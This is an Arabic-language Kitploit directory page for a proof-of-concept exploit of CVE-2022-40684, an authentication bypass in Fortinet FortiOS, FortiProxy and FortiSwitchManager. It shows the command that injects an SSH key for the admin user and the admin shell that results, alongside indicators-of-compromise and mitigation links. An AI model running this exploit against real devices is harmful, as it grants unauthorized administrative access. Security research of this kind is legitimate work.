Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-40684 — إثبات مفهوم لثغرة تجاوز المصادقة CVE-2022-40684 في Fortinet FortiOS وFortiProxy وFortiSwitchManager، مما يتيح حقن مفتاح SSH لمستخدمين محددين. | Kitploit
أدوات/GitHubGitHub/puckiestyle/cve-2022-40684
تحليل الثغرات الأمنيةالاستغلالأمن الويبأمن الشبكاتاختبار الاختراقالمصادقة
GitHubpuckiestyle/cve-2022-40684

CVE-2022-40684

إثبات مفهوم لثغرة تجاوز المصادقة CVE-2022-40684 في Fortinet FortiOS وFortiProxy وFortiSwitchManager، مما يتيح حقن مفتاح SSH لمستخدمين محددين.

عرض المستودع
منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-40684

POC لـ CVE-2022-40684 يؤثر على أجهزة Fortinet FortiOS وFortiProxy وFortiSwitchManager.

التحليل الفني

يمكن العثور على تحليل فني للسبب الجذري للثغرة على مدونتنا: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684

مؤشرات الاختراق

لتحليل سجلات Fortinet لمؤشرات الاختراق وكيفية تمكين السجلات الأعمق، تفضل بزيارة مدونة مؤشرات الاختراق لدينا: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/

الملخص

يستغل هذا الـ POC ثغرة تجاوز المصادقة لتعيين مفتاح SSH للمستخدم المحدد.

الاستخدام

root@kitploit:~
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.

إجراءات التخفيف

قم بالتحديث إلى أحدث إصدار أو خفف المخاطر باتباع التعليمات الواردة في Fortinet PSIRT

  • https://www.fortiguard.com/psirt/FG-IR-22-377

تابع فريق الهجوم Horizon3.ai على تويتر لأحدث الأبحاث الأمنية:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

إخلاء مسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا بإذن صريح. القائمون على المشروع ليسوا مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.

تنزيل الأداة